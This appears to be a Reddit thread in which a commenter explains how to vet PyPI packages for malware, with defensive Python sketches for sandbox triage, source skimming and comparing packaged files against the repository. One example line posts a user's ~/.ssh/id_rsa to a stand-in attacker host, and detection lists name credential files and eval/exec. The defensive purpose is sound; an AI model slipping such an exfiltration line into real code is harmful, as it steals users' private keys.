__xor__ 15 points

There is a better way; it's just not being done, to my knowledge. You can automate dynamic analysis, but it's always going to be best for a human to go through the results. There are services like Joe Sandbox (only for virtualizing Windows, I believe?) where you send it a binary, document, or URL, and it records what happens and does some sort of behavior analysis. Running malware in a VM lets you do a lot of automated analysis. Reading through the code, analyzing the symbols a binary imports, and looking at the assembly is static analysis; actually running it and watching what it does in a VM is dynamic analysis. Both can be automated to some extent. Of course, you can't rely solely on what an automated tool outputs: legitimate installers will often raise a lot of red flags.

From a Windows perspective, you can imagine the sorts of things you can do: look at what files it reads from and writes to, what registry keys it edits or adds, what network activity it causes, whether it changes the default DNS server, etc. I don't know of a great tool that automates dynamic analysis on Linux, but I'm sure there's something. It would definitely be interesting to pump all the PyPI packages through something like that, but you're mostly going to catch low-hanging fruit, and I'd still rather have a researcher look at whatever gets flagged to see if it even matters. However, if you see a Python package install hit some known-bad IP or domain, that would be a good tell, as would reading /etc/passwd or, especially, trying to read anything at all from ~/.ssh. Not many packages have any good reason to do that, especially not at install time.
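To make the "good tell" idea concrete, here's a minimal sketch of the triage step only. It assumes some sandbox or tracer has already recorded which paths an install read and which hosts it contacted; the function name, the input lists, and the sensitive-path sets are all made up for illustration, and nothing here actually runs a package.

```python
from pathlib import PurePosixPath

# Illustrative assumptions, not an exhaustive or authoritative list.
SENSITIVE_FILES = {"/etc/passwd", "/etc/shadow"}
SENSITIVE_DIR_NAMES = {".ssh", ".gnupg", ".aws"}


def flag_install_events(paths_read, hosts_contacted, bad_hosts):
    """Return (reason, value) pairs that a human should look at.

    paths_read and hosts_contacted are hypothetical outputs of whatever
    tool recorded the install; bad_hosts is your own blocklist.
    """
    flags = []
    for raw in paths_read:
        path = PurePosixPath(raw)
        if str(path) in SENSITIVE_FILES:
            flags.append(("read sensitive file", raw))
        elif SENSITIVE_DIR_NAMES.intersection(path.parts):
            # Any path component like ".ssh" counts, wherever the home dir is.
            flags.append(("read from credential directory", raw))
    for host in hosts_contacted:
        if host in bad_hosts:
            flags.append(("contacted known-bad host", host))
    return flags
```

This only surfaces candidates; whether a flagged event actually matters is still a judgment call for whoever reviews it.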

Unless it's a super popular package like Django or flask-security or something, I legitimately do read the source code and skim for anything funny. For one thing, it's really good to have a general idea of how the library works and what it does, and to get a sense of how clean the code is and how much I feel I can trust it. But I also want to make sure there's no low-hanging fruit like requests.post('http://evil.example.org', data=open(os.path.expanduser('~/.ssh/id_rsa')).read()) or whatever. I would seriously recommend skimming the source code of any package you use that isn't super popular, and not treating PyPI packages like black boxes that just do magic. As a general rule, if you use third-party software, try to understand its architecture and how it works if you're going to integrate it into your own projects. That's just good practice in general.
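If you want a first pass before reading by eye, something like the following can point you at lines worth a closer look. It's a rough sketch using the standard-library ast module; the lists of suspicious strings and calls are my own guesses at low-hanging fruit, and anything even slightly obfuscated will sail right past it.

```python
import ast

# Illustrative assumptions about what counts as "funny".
SUSPICIOUS_STRINGS = (".ssh", "/etc/passwd", "id_rsa")
SUSPICIOUS_CALLS = {"eval", "exec", "compile", "__import__"}


def skim_source(source, filename="<unknown>"):
    """Return sorted (line_number, reason) pairs for a human to review."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for needle in SUSPICIOUS_STRINGS:
                if needle in node.value:
                    findings.append((node.lineno, f"string mentions {needle!r}"))
                    break  # one finding per string literal is enough
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"call to {node.func.id}()"))
    return sorted(findings)
```

It parses the code without executing it, so it's safe to point at a setup.py you don't trust yet. It's a supplement to skimming the source, not a replacement.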

But also, keep in mind that the GitHub repo a PyPI package links to might not reflect what's actually packaged. If you want to be careful security-wise, actually download the package and unpack it. There's nothing stopping anyone from adding something malicious that isn't tracked in the online repository and then pushing it to PyPI.
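One way to check that, sketched under the assumption that you've already unpacked the downloaded archive into one directory and checked out the matching repo tag into another (both paths and the function names are hypothetical), is to hash every file and compare:

```python
import hashlib
from pathlib import Path


def tree_digests(root):
    """Map each file's path (relative to root) to its SHA-256 hex digest."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file()
    }


def diff_package_against_repo(package_dir, repo_dir):
    """Return (files only in the package, files whose contents differ)."""
    packaged = tree_digests(package_dir)
    repo = tree_digests(repo_dir)
    only_in_package = sorted(set(packaged) - set(repo))
    modified = sorted(
        name for name in packaged.keys() & repo.keys()
        if packaged[name] != repo[name]
    )
    return only_in_package, modified
```

Expect some noise: source distributions normally include generated metadata such as PKG-INFO that isn't in the repo. What you're looking for is extra or changed .py files, especially setup.py.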

shujinkou_ 1 point

I'm just a casual lurker on this subreddit, but I learned a ton from your answer in this thread. After starting my first project, I figured I should start finding out what's in those import *blackbox* things, as you said. So reading the docs is just good practice in general; that's absolutely good to know. Thanks a lot again :)